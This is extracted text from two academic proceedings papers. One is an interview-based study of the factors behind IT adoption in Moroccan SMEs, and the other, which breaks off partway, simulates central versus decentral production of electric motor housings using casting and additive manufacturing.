Today, IT has become essential to the activity of a company and this in an economic context that is constantly changing [1]. The application of IT can be considered as the use of an information system (IS) to control information at all levels of the company [1]. The IS is closely linked to all functions and facets of the company and is becoming essential. Without it, it becomes difficult for a company to compete with its competitors, to manage administrative constraints and to be informed of what is happening in the economic markets [1]. The IS plays an essential role in supporting organizational processes, it is considered a “nervous system” [2, 3]. The IS represents the infrastructure in IT, data, applications and personnel, it links the different elements to provide a complete solution [4]. As such, it includes a large number of functions such as data collection and transmission. Nowadays, Moroccan companies, including SME, are faced with ever-changing market requirements. In order to best satisfy the organization, it is important to achieve a coherent and agile IS to integrate the new needs of the company. However, if the IS system plays a central role in the activity and life of the company, and if it can contribute to rationalization and growth, it can also be the cause of a chaotic operation. Guariglia et al. explain that SMEs reduce their level of investment in technology development because of limited financial resources and the difficulty of obtaining external funding [5]. Parasuraman measures technology use readiness based on the Technology Readiness Index (TRI), which has four dimensions: optimism, innovation, unease, and insecurity [6]. Many researches have studied the readiness to use information technology, but none have focused on the factors that influence the readiness of SMEs to adopt technology. This paper attempts to identify the factors that influence the adoption of IT in the context of Moroccan SMEs.
2 Research Question The diffusion of IT within developing countries can be an effective lever for economic and social development. IT is both a good and a service that allows a wide diffusion of knowledge and know-how, but also an investment good that allows to increase the microeconomic performance of companies by increasing productivity and constitutes an industry that can significantly contribute to the increase of the macroeconomic performance of nations. IT play today a preponderant role in the development of Moroccan SMEs by supporting one or several functions within the organization. The purpose of this research is to identify the factors that influence the adoption of IT in the context of Moroccan SMEs. The research addresses the following question: What are the factors that influence the adoption of IT in the context of Moroccan SMEs?
288
Y. Zouhair et al.
3 Literature Review 3.1 Definition of SME The size criterion is most often taken into consideration in the process of defining of an SME notwithstanding the diversity of approaches that have attempted to define the SME. In fact, each country has a distinct way of defining of the SME, which is usually based on “number of employees”. According to the "White Paper on SMEs”, produced by the Ministry of the Prime Minister in charge of General Government Affairs (1999) it is not easy to define the term SME. In Morocco, SME has a wide variety of definitions. In fact, there are several definitions depending on the elements taken into consideration. To qualify as an SME, existing companies must have a workforce under 200 permanent employees, have an annual turnover excluding tax under 75 million Moroccan Dirham (MAD), and/or a balance sheet total under MAD 50 million. However, the definition of the SME elaborated by the ANPME takes into account only the criterion of the turnover and disregards the number of workers of the company. According to this last definition, three types of companies are distinguished: • The very small company: less than 3 million MAD • The small company: between 3 and 10 million MAD • The medium enterprise: between 10 and 175 million MAD 3.2 Adoption of Information Technology A study was done by Parasuraman [6], they define technological readiness as “the propensity of people to adopt and use new technologies to achieve goals in private life and in the workplace”. TRI is an index that was set by Parasuraman [6] to measure a person’s ideas and beliefs about the application of technology. A person’s thinking about the application of technology can be positive, i.e. speaking optimistically about the application of technology and also having the will in the use of new technologies, or negative, i.e. feeling uncomfortable towards technology. There are four dimensions to technology readiness: Optimism: refers to a positive view of technology as well as the perceived benefits of using technology. Innovation: refers to the degree to which the person enjoys experimenting with the use of technology and being among the first to try the latest technology services or products. Discomfort: refers to the lack of mastery of technology as well as a lack of confidence in the use of technology.
Factors Affecting the Adoption of Information Technology
289
Insecurity: refers to the distrust of technology-based transactions. Optimism and innovation can help increase technological readiness, they are “contributors”, while for others, discomfort and insecurity are “inhibitors”, they can suppress the level technology readiness [7]. According to Parasuraman et al. [7], technology readiness is a tool for measuring thoughts or perceptions about technology use and not as a measure of a person’s ability to use technology. Depending on the level of technology readiness, users are classified into five sections: Explorers have the highest score in the ‘contributor’ dimension (optimism and innovation) and a low score in the ‘inhibitor’ dimension (discomfort and insecurity), they are easily attracted to new technologies and generally become the first group to try new technologies [8]. The laggards have the lowest score in the ‘contributor’ dimension (optimism and innovation) and the highest score in the ‘inhibitor’ dimension (discomfort and insecurity), they are the last group to adopt a new technology [8]. The others (the pioneers, the skeptics and the paranoids) have a very complex perception of technology [8]. Pioneers have a higher level of optimism and innovation like explorers, but they can easily stop using technology if they get discomfort and insecurity [8]. Skeptics are not very motivated by the use of technology, but they have a low level of the ‘inhibitors’ dimension; they need to be informed and convinced by the benefits of the technology [8]. Technology is quite interesting for paranoids but they always take into account the risk factor, which allows them to have a high level of the ‘inhibitors’ dimension (discomfort and insecurity) [8]. Lucchetti et al. [9] studied several cases of Italian SMEs, they noted that the adoption and use of information and communication technologies (ICT) was differentiated, depending on the nature and internal funds of the company, on the one hand, and the technological skills used in the company, on the other. According to Harindranath et al. [10] the fear of limited use of technology and the need to update technology frequently is one of the concerns of UK SMEs. According to Nugroho et al. [11] customer pressure, need, capital, urgency, and ease of use are the factors that influence SMEs in Yogyakarta to adopt IT. Research has shown that the relative advantage of these technologies, competitive pressure, and management support are significant predictors of IT adoption [12]. According to Beatty et al. [13] and Dong [14] leaders and their commitment play a crucial role in the IT adoption decision. Thong et al. [15] states that CEO’s innovation, CEO’s IT knowledge, CEO’s attitude to adopting IT, company size, information intensity and competitive environment are the factors that influence SMEs to adopt IT. According to Khalil et al. [16], organizational structure, technology strategy, human organization and external environment affect the intention to adopt IT. Grandon et al. [17] and Tung et al. [18] found that social influence and external pressure are significantly related to IT adoption.
290
Y. Zouhair et al.
The results of Naushad et al. [19] indicate that SMEs adopt IT to gain an advantage over their competitors. Value creation, productivity, ease of use and affordability are the top reasons. Top management support and cost-effectiveness are other essential factors that influence IT adoption. Other pertinent factors include personal characteristics and technology self-efficacy. Shaikh et al. [20] affirm that high infrastructure costs, data security, cost of training, lower efficiency and technical skills, lower government support and lack of support from the organization are factors that influence the adoption of IT. Kossaï et al. [21] show that firm size, export and import intensity, and business human capital are the most significant factors in the adoption of IT. In our study, technological readiness can be defined as the preparation to improve the quality of the currently used technology, in other words to update the level of the technology.
4 Research Methodology This paper attempts to identify the factors that influence the adoption of IT in the context of Moroccan SMEs. We applied a qualitative research approach using the interview technique. This research used the design of several case studies to describe the phenomenon [22]. According to Yin [22, 23], the case study method can be used to explain, identify, or study events or phenomena in their real-life context. In addition, “case studies are particularly recommended when dealing with new and complex areas, where theoretical developments are weak and the recovery of the context is crucial for the development of the understanding process” [22, 23]. The use of the case study method is relevant when the study has to answer research questions such as “what”, “how” and “why” [22, 23]. This fits exactly with our problem. In this research, we used the snowball sampling technique while the results of the interviews are analyzed using a descriptive statistical approach. Prior to the interview session, informants were given sample questions to discuss during the interview sessions. Participants The population of this study includes team leaders, users, internal IT managers, external consultants, and people with knowledge of the Moroccan SME sector with different levels of education and experience. The idea is to collect data from organizations operating in the SME sector in order to identify factors that influence the adoption of IT in the Moroccan SME context. All case organizations operate in the private sector in Morocco. The organizations are labeled Company A, Company B, Company C and Company D. Table 1 provides an overview of the cases studied.
Factors Affecting the Adoption of Information Technology
291
Table 1. Description of the case studies Company A
Company B
Company C
Company D
Nature and industry
Consulting
Transport & Logistics
Audit
Service
Number of employees
20
90
24
41
Number of interviews
6
9
5
7
Interview participants
Managers, team leaders, users and internal IT managers
Managers, team leaders, users, external consultants and internal IT managers
Managers, team leaders, users and internal IT managers
Managers, team leaders, users and internal IT managers
Procedure We applied a qualitative research approach using the interview technique. The data were collected through personal interviews, a total of 27 interviews conducted in the four organizations. Interviews were conducted with managers, team leaders, users, external consultants and internal IT managers in order to collect the different perspectives that influence the adoption of IT in the context of Moroccan SMEs. The duration of the interviews was between 30 and 60 min. E-mails and telephone calls were used to clarify some questions. In the first section of the interview, informants were asked to provide demographic and company information. In the second phase, we began asking questions based on Parasuraman’s instruments [6], for example: How does the IS contribute to the company’s sustainability? Do you have unpleasant experiences in using the IS? How does the IS affect your work? Why do you want to apply IS in your company? Why don’t you want to apply IS in your company? Describe your reasons to use or not use IS in your company. Tell me about your experience interacting with IS. When choosing an IS, how will you select the system that you believe is best for your company? How does the environment affect your decision to use IS? The company is still supporting the advancement of the use of technology. Has the progress of the system already brought benefits to your company? For what kind of condition and purpose is it intended?
292
Y. Zouhair et al.
5 Findings and Results The frequency of technology adoption varies from organization to organization and this is the result of a panoply of organizational, individual, technological, and environmental factors, which are directly or indirectly correlated with the decision to adopt or not adopt. The determinants that will be discussed in this research are the results of the informant interviews. 5.1 Organizational Factors Organizational factors are primarily related to the structure and strategy of the organization. The first factor is organizational strategy, informants state that the level of communication between departments within an organization is positively correlated with the commitment of departments in the process of adopting innovations, as well as the establishment of a project management team responsible for the implementation and integration of these technologies significantly increases the probability of successful adoption. The second factor is the size of the company, it presented as a good predictor of technology adoption, informants say that if the size of the company increases, IT will be needed. The informants also pointed out the importance of tangible resources of a human and material nature, as well as intangible resources, notably the stock of knowledge at the enterprise level in the decision-making process for the adoption of new technologies. Material resources are critical for innovation, development and new technology acquisition projects. For their part, human resources and intangible resources, especially the stock of knowledge available to firms, affect their propensity to adopt new technologies through their impact on the absorption capacity of the knowledge incorporated into these new technologies. Employee competence is among the factors for IT adoption mentioned by informants, the more qualified the staff, the more likely they are to seek out new technologies. Staff skills refer to the competence of employees, their level of experience, and their versatility. According to the informants, technological compatibility positively influences the adoption decision. This technological compatibility is composed of two dimensions: a high degree of confidence that the new technology is compatible with the company’s current operations and practices, and that the company believes in the availability of the necessary resources for the implementation and integration of the technology; and, above all, its conviction that it has the competent human resources to succeed in the processes of adoption and integration of the new technology. Informants mentioned that the vision of the organization’s senior management and their knowledge of the innovation or technology to be adopted would also be significant determinants of whether or not to adopt that innovation or technology. Finally, some informants identified the timing of a technology’s adoption as a determinant of whether or not it is adopted.
Factors Affecting the Adoption of Information Technology
293
5.2 Individual Factors The second category of factors is individual factors. Informants mentioned that the perceived usefulness of a technology significantly and positively influences the decision to adopt it, when the potential user of the technology perceives that its use will increase production while maintaining quality, decrease the unit production cost, and make the company more competitive, the likelihood of its adoption will increase. Some informants argued that individuals in an organization, regardless of size, are decisive in the decision to adopt a new technology, as adoption is directly dependent on their skills, knowledge, and ability to foster successful implementation of the technology. On the other hand, other informants identified user resistance behavior to technology as a barrier to adoption. 5.3 Technological Factors This category of factors refers to factors external to the company. These are essentially non-controllable factors directly related to the technology to be adopted, such as the attributes of the technology, its maturity and the characteristics of the technology. These characteristics include the perceived compatibility of the technology to be adopted with existing technologies, its complexity, and the perceived net benefit of its adoption. Informants identified acquisition costs and integration costs of a new technology as important and often decisive barriers to adoption by the company. The complexity of the technology to be adopted could be a barrier to adoption. Since the potential users of this technology will be the employees, we will capture this complexity by the intensity of the barriers experienced by the informants. A final factor that falls into this category is associated with the uncertainty related to the evolution of the technology within the company. 5.4 Environmental Factors Informants mentioned that the extent of the SME’s social network, including with suppliers, customers, and research institutions, can influence its decision whether to adopt a new technology. These networks help build trust and social capital between the firm and its key partners. It can thus reduce transaction costs and establish reliable and efficient communication with the members of its network. This creates a climate that is conducive to innovation and the successful integration of new technologies. All informants have expressed the same idea that use of IT can help in marketing of products. Although it is seen as an aid to marketing, some informants believe that customer satisfaction can be obtained through the adoption of IT because it allows for the interaction between the potential buyer and the products. The Table 2 summarizes the various factors that influence the adoption of IT in the context of Moroccan SMEs.
294
Y. Zouhair et al. Table 2. IT adoption factors
Category
Factors
Organizational
Organizational strategy The size of the company Human and material resources The stock of knowledge at the company level The competence of the employees Technological compatibility The vision of the organization’s senior management The timing of adoption
Individual
Perceived usefulness of the technology Individual skills, knowledge, and abilities Resistance to change
Technological
Technology characteristics: relative advantage, perceived compatibility and complexity Acquisition costs and integration costs Technology maturity Perceived net benefit of the technology The level of uncertainty associated with the technology
Environmental
The company’s social network and its role as a source of information (customers, competitors, suppliers, research institutions, etc.) Knowledge sharing with suppliers and customers Reliable and effective communication with members of its network
6 Conclusion and Future Works The purpose of this study was to identify the factors that influence the adoption of IT in the context of Moroccan SMEs. We applied a qualitative research approach using the interview technique. This research used the design of several case studies to describe the phenomenon. The frequency of technology adoption varies from one organization to another and is the result of a range of organizational, individual, technological, and environmental factors that are directly or indirectly correlated with the decision to adopt or not to adopt. The determinants discussed in this research are the results of the interviews conducted with the informants. These determinants are of two types: internal determinants, which refer to organizational and individual factors, also referred to as organization-specific (controllable) factors; and external determinants, which include technology-specific factors (technological factors) and factors related to the environment in which the organization operates (environmental factors). This study has several limitations, namely: • The difficulty of extending the scope to other Moroccan SMEs • The confidentiality of the companies
Factors Affecting the Adoption of Information Technology
295
The study provides several future research themes: critical success factors for IT implementation projects in the context of Moroccan SMEs, extending this study to other Moroccan SMEs, and confirming the results of this qualitative research with quantitative research.
References 1. Carpentier, J.-F.: La gouvernance du Système d’Information dans les PME Pratiques et évolutions. Editions ENI (2017) 2. St-Hilaire, F.: Les problèmes de communication en entreprise: information ou relation? Université Laval, Diss (2005) 3. Millet, P.-A.: Une étude de l’intégration organisationnelle et informationnelle. Application aux systèmes d’informations de type ERP. Diss. INSA de Lyon (2008) 4. Hammami, I., Trabelsi, L.: Les Green IT au service de l’urbanisation des systèmes d’information pour une démarche écologiquement responsable. No. hal-02103494 (2013) 5. Guariglia, A., Liu, X., Song, L.: Internal finance and growth: microeconometric evidence on Chinese firms. J. Dev. Econ. 96(1), 79–94 (2011) 6. Parasuraman, A.: Technology Readiness Index (TRI) a multiple-item scale to measure readiness to embrace new technologies. J. Serv. Res. 2(4), 307–320 (2000) 7. Parasuraman, A., Colby, C.L.: Techno-Ready Marketing: How and Why Your Customers Adopt Technology. Free Press, New York (2001) 8. Demirci, A.E., Ersoy, N.F.: Technology readiness for innovative high-tech products: how consumers perceive and adopt new technologies. Bus. Rev. 11(1), 302–308 (2008) 9. Lucchetti, R., Sterlacchini, A.: The adoption of ICT among SMEs: evidence from an Italian survey. Small Bus. Econ. 23(2), 151–168 (2004) 10. Harindranath, G., Dyerson, R., Barnes, D.: ICT adoption and use in UK SMEs: a failure of initiatives? Electron. J. ˙Inf. Syst. Eval. 11(2), 91–96 (2008) 11. Nugroho, M.A., et al.: Exploratory study of SMEs technology adoption readiness factors. Procedia Comput. Sci. 124, 329–336 (2017) 12. Ifinedo, P.: An empirical analysis of factors influencing Internet/e-business technologies adoption by SMEs in Canada. Int. J. ˙Inf. Technol. Decis. Mak. 10(04), 731–766 (2011) 13. Beatty, R.C., Shim, J.P., Jones, M.C.: “Factors influencing corporate web site adoption: a time-based assessment. Information & management 38(6), 337–354 (2001) 14. Dong, L.: Modelling top management influence on ES implementation. Bus. Process Manag. 7, 243–250 (2001) 15. Thong, J.Y.L., Yap, C.S.: CEO characteristics, organizational characteristics and information technology adoption in small businesses. Omega 23(4), 429-422 (1995) 16. Khalil, T.M.: Management of Technology: The Key to Competitiveness and Wealth Creation. McGraw-Hill Science, Engineering & Mathematics (2000) 17. Grandon, E.E., Pearson, J.M.: Electronic commerce adoption: an empirical study of small and medium US businesses. Inf. Manag. 42(1), 197–216 (2004) 18. Tung, L.L., Rieck, O.: Adoption of electronic government services among business organizations in Singapore. J. Strat. Inf. Syst. 14(4), 417–440 (2005) 19. Naushad, M., Sulphey, M.M.: Prioritizing technology adoption dynamics among SMEs. TEM J. 9(3), 983 (2020) 20. Shaikh, A.A, et al.: A two-decade literature review on challenges faced by smes in technology adoption. Acad. Mark. Stud. J. 25(3) (2021)
296
Y. Zouhair et al.
21. Kossaï, M., de Souza, M.L.L., Zaied, Y.B., Nguyen, P.: Determinants of the adoption of information and communication technologies (ICTs): the case of Tunisian electrical and electronics sector. J. Knowl. Econ. 11(3), 845–864 (2019). https://doi.org/10.1007/s13132018-0573-6 22. Yin, R.K.: Design and methods. Case Study Res. 3(92), 1–9 (2003) 23. Yin, R.K.: Case Study Research: Design and Methods, vol. 5. Sage, Thousands Oaks (2009)
Aspects of the Central and Decentral Production Parameter Space, its Meta-Order and Industrial Application Simulation Example Bernhard Heiden1,2(B) , Ronja Krimm1 , Bianca Tonino-Heiden2 , and Volodymyr Alieksieiev3 1
3
Carinthia University of Applied Sciences, 9524 Villach, Austria [email protected] 2 University of Graz, 8010 Graz, Austria Faculty of Mechanical Engineering, Leibniz University Hannover, An der Universit¨ at 1, Garbsen, Germany http://www.cuas.at
Abstract. In this paper, after giving an overview of this research field, we investigate the central-decentral parameter room using a theoretical approach, including a cybernetic meta-order concerning system theoretic concepts. For this, we introduce an axiom system with four axioms describing production systems in general. The modeling axiom and three axioms for system states: The attractor, bottleneck, and diversity theorem, all describing complex ordered systems. We then make a numerical investigation of central and decentral production in conjunction with a practical industrial application example and compare it to previous simulation results. As a result, we recommend simulating production concerning these two possibilities, central and decentral in the production control parameter-space and accompanying additional production parameters, from the customer and the product quantity to produce case-specific optimally. Keywords: Orgiton theory · Graph theory · Witness · Central · Decentral · Production · Manufacturing · Logistics · System theory Cybernetics · Decentral control · Heterarchical systems · Additive manufacturing · AM
1
·
Introduction
In production, there arises the question of optimal production in general. So for this, future trends like Industry 4.0 (see, e.g. [1]) tend to flexibilize the production and include a lot of more and more sophisticated automation. This new trend of automation and automation of automation, can be regarded as an approximation of what we understand today under Artificial intelligence or AI. So in this context, production control becomes increasingly important, as there are, due to flexibility arrangements, -possibilities, and production efficiency need, possibly c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 297–309, 2023. https://doi.org/10.1007/978-3-031-28073-3_21
298
B. Heiden et al.
to be implemented new strategies that were not feasible up to now technologically, as e.g. the arising paradigm of Additive Manufacturing (AM) (see, e.g. [8]) changes production in principle. This is closely linked to the new arising osmotic paradigm, that is inclined towards decentrality as it increases ecological properties like resilient, and overall efficient production as general known properties by means of diversity, autonomy and heterarchy (cf. e.g. [13,26]). In this context it can be seen, that production technologies like AM and Computer Numerical Controlled (CNC) machines in general allow for emergent features like flexible, personalized and decentral production as a consequence of their basic process-structure. So the hypothesis is that new production methods are more aped to fulfill current requirements like the diversity of products or the diversity of costumer buy decisions, to mention only two. So the essential point in personalization and flexibilization is whether it makes sense from the efficiency points of view in a modern production environment and how to achieve this with central or decentral strategies. Up to now, the central paradigm was without question, but as it gets to its limit, we have to ask where, when and how this makes sense under specific points of views. The problem of central-decentral control is well known in general and is the only classification type for production and production control that we will focus on here. It relates to general properties that we can find in networks (e.g., [30]) or graph theory (see, e.g., [4]), where a lot of research has been done. For example, according to Watts and Strogatz, some networks have the now famous “small world” properties, which means that already very sparse networks are effectively cross-linked, similar to a dense net. Graph theoretical approaches, on the other side, allow for applying algorithms. Still, according to their computational implementation, they may not be so easy to be argued with or to be understood. Therefore, our strategy is to find general argumentation strategies that we then test in more detail for their validity by simulation models in this work. Other recent approaches for the arising decentral paradigm are the holonic manufacturing approach, heterarchical systems, the distributed control or multiagent systems (cf. also [27]), that can be for example straight forward implemented in the program Anylogic1 . The emergent necessity for this kind of often neglected research is that it becomes necessary in an environment of more and more dense nets of material and informational processes. The very reason is that, in this particular case of a complex system, and generally, in nonlinear systems, a new and unpredicted behavior of systems is to be expected (cf. e.g. [14]) and has to be investigated to make a difference in the efficiency of such production processes. Content. In this paper, we give after the presentation of the research goal, question, method and limitation in Sect. 2 the meta-description of the centraldecentral production parameter space. In Sect. 3 we introduce the used Witness model, and discuss it there. In Sect. 4 we finally conclude with open and promising research questions in the field. 1
https://www.anylogic.de/.
Central Decentral Meta-Order and Application Example
299
Goal and Research Question. The goal of this paper is to investigate further the properties of production in the parameter space of central and decentral production. The research question is: Which parameters influence the production, focusing on the bi-valued discrimination in the parameter space of centraldecentral production and which control method shall be preferred under which conditions? Research Method. This research paper analyzes the research question and gives in Sect. 2 a natural language axiomatization for the research focus and thesis. Section 3 explores the topic with a Witness simulation example of an industrial production problem and relates it to the given axiomatization. By this we use a modern cybernetic knowledge process approach (see e.g. [25,29]). Limitations. The limitation of this work is that only a limited complexity of the simulation model is computed, as well as the problem is restricted theoretically and practically to only a few parameters in production. Hence it might be that other parameters could also be necessary. Another significant limitation is the bi-valued discrimination of central-decentral models, which could be overcome in future research by more sophisticated models and or with a transition model for a seamless transition in the parameter-space central-decentral. For this, in special, there would have to be defined a complex variable intermediating between the two extremes. An interesting and promising approach in this regard is found in [6], where a typology of transition in the parameter space central-decentral is given in the form of specific networks, which we are planning to investigate in the future.
2
Metadescriptive Approach in Orgitonal Terms of the Central-Decentral Problem
When we look at the central-decentral parameter space, we can formulate the following meta-descriptive system properties, which we will test and confirm later in more detail. As first Axiom we formulate the modeling theorem, which allows for an overall modeling of the production process by a digital twin: Axiom 1. The production can be divided into an information and a material production line which both are (a) decoupled with respect to time/room and (b) structurally coupled to each other and the environment. According to orgiton and systems theory (see also [12,28]), the information process is of potentially higher order and structurally coupled with the material process, which we can also call attractor theorem: Axiom 2. Information and material processes have an attractor according to their order and can hence dominate or limit the process.
300
B. Heiden et al.
Therefore, the domination process is limiting efficiency. For a further explanation of the attractors related to the growth process see also our recent investigation of growth processes [11], which can be understood as bottleneck theorem: Axiom 3. Production can be regarded as a growth process under limitations. Optimal production is at the overall dominating limit. How diversity creates approximate optimality can be expressed by the following diversity theorem: Axiom 4. The central-decentral parameter space in production integrates production parameters into overall production efficiency. This Axiom relates to or constitutes the hypothesis that in the lockstepping region of a growth process, an order can emerge through an arising osmotic diversity. Hence, combinatorial arrangements allow for continuing or autopoietic evolution processes, due to, e.g., the property of self-similarity.
3
Model in Witness and Comparison to Previous Approach
The following use case has the function of a concrete example that is applied to demonstrate the problem [18] is covering in a practical context. One factor that changes production systems more than others is the technology with which the products are manufactured. One technological advancement of great impact is Additive Manufacturing (AM), also known as 3D-Printing. It is not only a different approach to how materials are processed, compared to conventional manufacturing, but it also makes a different structuring of production systems possible. Therefore, the manufacturing of electric motor housings with AM and with traditional processes will be used as an example to simulate the different production and production control systems. In the next subsections, a short summary of both manufacturing processes will be given and will it be explained how they relate to the production of the electric motor housing. The findings will then be used to create the simulation of the use case in the production simulation software Witness [19]. 3.1
Traditional and Additive Manufacturing (AM)
In short, as its name implies, AM adds layer upon layer of a certain material in a desired geometric shape in order to “grow” a three-dimensional object that was defined beforehand by Computer Aided Design (CAD) software or 3D object scanners (see, e.g. [8] and [2]). There are various AM processes, including powder bed fusion, binder jetting, direct energy deposition or material extrusion. Each technology can not process all materials. Materials that AM technologies can generally process are metals, thermoplastics, and ceramics [7]. Traditional
Central Decentral Meta-Order and Application Example
301
manufacturing processes, by contrast, are solidification processes like casting or molding, deformation processes like forging or pressing, subtractive processes like milling, drilling, or machining and last but not least, joining processes like welding, brazing, and soldering [22]. Some of these techniques are hundreds of years old but are still used in an adapted and optimized way. 3.2
Electric Motor Housing as Application Example for the Case Study
Kampker describes in [16] the classical production of an electric motor housing in great detail as he counts it as one of the essential parts of the motor because it protects its active machine parts. There are three steps needed to manufacture the housing. First, the form is cast where different methods are available, primarily depending on the number of units that must be produced. The second process step is machining like deburring, milling, or drilling to ensure that all the form and surface requirements are met, and the last step is cleaning the workpiece to ensure a smooth assembly. One problem with motors independent of their type, combustion engine or electric motor, is that they have to be cooled in order to work correctly. There are several solutions for heat removal for electric motors. Traditionally an electric motor has a liquid cooling system, meaning that a liquid is pumped through assorted hoses and is rejected through a radiator [15]. This system is effective, but it adds difficulties to the design and production of the housing because cooling lines have to be added, resulting in a complex manufacturing process containing not just the housing but several parts combined into one module. The German company PARARE GmbH is specialized in selective metal laser melting and has developed together with the Karlsruhe Institute for Technology an electric motor housing with an integrated cooling channel as depicted in [24]. Due to the freedom of geometry, AM opens up possibilities to reduce the number of parts in a module and, by this, also assembly costs. However, a disadvantage of AM is that simple components or standard parts are already “cheap” to manufacture and they do not become cheaper through AM. The highest potential of AM lies hence in the performance enhancement of parts and lightweight construction especially for this concerning metals, small-scale production and individualization. The reason is that production cost and time stay the same whether the same part is produced n-times or n different parts are produced. The design effort increases, of course, if a product is optimized for the requirements of a customer [23]. The production of an electric motor housing with a liquid cooling system will serve as the use case in order to simulate a central and decentral production control system where the decentral production system works with AM, and the central production system works with the traditional manufacturing of the said product.
302
3.3
B. Heiden et al.
Simulation of the Case Study in Witness
The first simulation in Fig. 1 (a) shows the central production control where the parts are pushed through the manufacturing process. As described above, the housing refers to the first step casting, the second step is machining, followed by cleaning. Finally, before the housing is put on stock, it will be assembled with the cooling pipes. In order to keep the simulation as compact as possible, the manufacturing of the other module parts is not shown, but their process time will be integrated at the process step “Assembly”. Central Instance-2
a.) Information →
Central Instance-3
Central Central Instance-4 Instance-5
environment border
Central Instance-1
Casting Information ↑↓
SCRAP Machining Information ↑↓
Material Casting →
Machining
Cleaning Assembly Information Information ↑↓ ↑↓ SCRAP Cleaning Assembly Stock
Order- ← Orders Customer information order ↑↓ → Customer
SHIP PrintingInformation
b.) Preparing-printerInformation
←
↑↓
Material →
SCRAP ↑↓
Post-processing Orders -Information
↑↓
↑↓
Preparing-printer Printing Post-processing Inventory
environment border
→
→
Customer-order Information ←
↑↓ Customer
SHIP
→
Fig. 1. Central (a) and decentral (b) production control system as Witness model [18]. The chain dotted line indicates the system border of information and material processes. The up and down arrows ↑↓ indicate the meta-information exchange between material and informational processes. The left and right arrows ← → Indicate the material and informational flows from and towards the environment with regard to their direction towards or from the border line which is limiting the cases (a) and (b). The model can be regarded as an implementation according to the overall process structure given in Axiom 1.
The second simulation in Fig. 1 (b) shows the decentral production control system where the parts are pulled through the manufacturing process, which consists of the following steps: first the printer and the printing needs to be prepared, the second step is the printing itself and the last step is the postprocessing after which the part will be put into the inventory and eventually shipped to the customer.
Central Decentral Meta-Order and Application Example
303
In order to show the differences between the production methods and control systems, two scenarios are calculated. One where a customer orders ten housings of a known type and another one where a customer orders two parts that are slightly differing prototypes. Scenario 1. The die casting process is a very fast production method as the metal, in this case probably an aluminum alloy, is injected into the mold within parts of a second and, depending on the wall thickness of the casting, cools in up to seven seconds. The longest part of the casting time is the die retention time with up to 30 s [5]. Under the condition that the molds already exist for the desired product, this manufacturing method is highly productive. Furthermore, it is assumed that only one mold for this product is used. The process steps, in this case, are (1) Preparation (only once for all parts), (2) Casting, (3) Machining, (4) Cleaning and (5) Assembly: P roduction − time − per − part = (1) + (2) + (3) + (4) + (5) 60 [min] + 1 [min] + 15 [min] + 1 [min] + 60 [min] 10 = 83 [min]
=
(1)
In order to calculate the total production time, the times of each process step are added, which results in 83 min for one part to be finished if the preparation time is evenly distributed over all parts. According to this model, it would take 830 min or nearly 14 h to produce 10 electric motor housings. AM, on the other hand, needs more time for production. The company Parare uses a printer which works with several lasers and can print four housings simultaneously. In order to print 10 housings, the printer needs to be prepared three times, and each part needs 10 min of post-processing. Printing four parts simultaneously takes 1440 min or 24 h. However, printing the remaining two parts after printing two times four housings should still take two thirds of the time, meaning 960 min. The process steps (1) Preparing the printer, (2a) Printing the first eight parts, (2b) Printing the last two parts simultaneously and (3) Post-processing add then up to: T otal − production − time = (1) + (2a) + (2b) + (3) = 3 · 5 [min] + 2 · 1440 [min] + 960 [min] + 10 · 10 [min]
(2)
= 3955 [min] ≈ 66 [h] Total production time adds up to 66 h, meaning that it would take up to three days to print all 10 electric motor housings.
304
B. Heiden et al.
Scenario 2. In this scenario, the time is looked at how long it takes for each production method to produce two slightly different and completely new designs of an electric motor housing. Each design is to be produced only once. Die casting is a procedure that is only used for producing high quantities as a lot of effort and investment is needed to create the new dies. For a scenario like this, sand casting is a better option because it is cheaper and faster. Moreover, for sand casting, a new sand mold is created for each part [3]. With two separate designs that need to be cast, total production time adds up according to the process steps (1) Preparation (of one sand mold), (2) Casting, (3) Machining, (4) Cleaning and (5) Assembly to: T otal − production − time = (1) + (2) + (3) + (4) + (5) = 2 · 2880 [min] + 2 · 5 [min] + 2 · 20 [min] + 2 · 1 [min] + 2 · 60 [min]
(3)
= 5932 [min] ≈ 100 [h] Using sand casting, it would take over four days to produce the prototypes. AM is known for its potential and proven performance in rapid prototyping on a high-quality level. The following times can be assumed for the process steps (1) 3D-Modeling (of both parts), (2) Preparing Printer, (3) Printing two parts simultaneously, and (4) Post-processing (for each part), using AM, in this case, and the total production time adds in the same order up to: T otal − production − time = (1) + (2) + (3) + (4) = 360 [min] + 5 [min] + 960 [min] + 2 · 10 [min]
(4)
= 1345 [min] ≈ 22, 5 [h] This technology makes it possible to manufacture two different parts in the time span of a day. Furthermore, it has to be mentioned that there is a difference in product performance that is not accounted for in the given simulation as it does not have an inherent relationship with production time or cost in this case: the printed housing cools the motor more efficiently, it saves room because the part is more minor, and it saves weight compared to the traditionally produced housing [24]. 3.4
Comparison to Previous Work
In order to further the discussion about the topic of central versus decentral control systems, a comparison between the results given above and results found by Knabe (see [17] and also [10]) will be given. His simulation aimed at a more abstract representation of the different control systems without implementing
Central Decentral Meta-Order and Application Example
305
realistic production processes. Another difference here is that this work has not looked at one fixed period of time like at Knabe’s 1440 min (one day), but at the time it takes the system to satisfy the customer demand. Therefore, there are large differences between the results found in Knabe’s work compared to the results of this paper but also significant similarities. One of the most important and also expected similarities is that of the complexity of the central production control model. There are constant connections between the central instance and every single process step needed to provide it with the required information to make decisions. He has also found that the length of the communication channels and the frequency of the information exchange influences the productivity of the systems [17]. The results of this paper does not reflect this as the productivity of the machines was not measured but it could be done in this hindsight. Again, both decentral system models are similar, as the production control is not as complex, with regard to information flow, as in a centrally organized system. Parts are only produced if they are actually demanded, which in his case results in varying productivity of the machines. The 3D-Printing process, in this case, is always working to capacity until all desired parts are produced. Regarding productivity, no meaningful comparison can therefore be made at this point. He concludes his thesis by saying that the demand or, more specifically, the number [#] and timing of the product orders play a significant role in the choice of the production control system [17]. By looking at the obtained results of this paper, you can add that the possible variants of a product and the “art of manufacturing” also play an important role in the said choice of the production control system. So concerning Table 1, which is ordered with regard to central and decentral, our simulation shows that central and decentral can have good or bad results, respectively, for the specific scenario case. Table 1. Summary of the scenarios of this work Scenarios
Parts produced Variants Total production time
Scenario 1 central
10
1
830 [min] ≈ 14 [h]
Scenario 1 decentral
10
1
3955 [min] ≈ 3 [d]
Scenario 2 central
2
2
5932 [min] ≈ 4 [d]
Scenario 2 decentral
2
2
1345 [min] ≈ 1 [d]
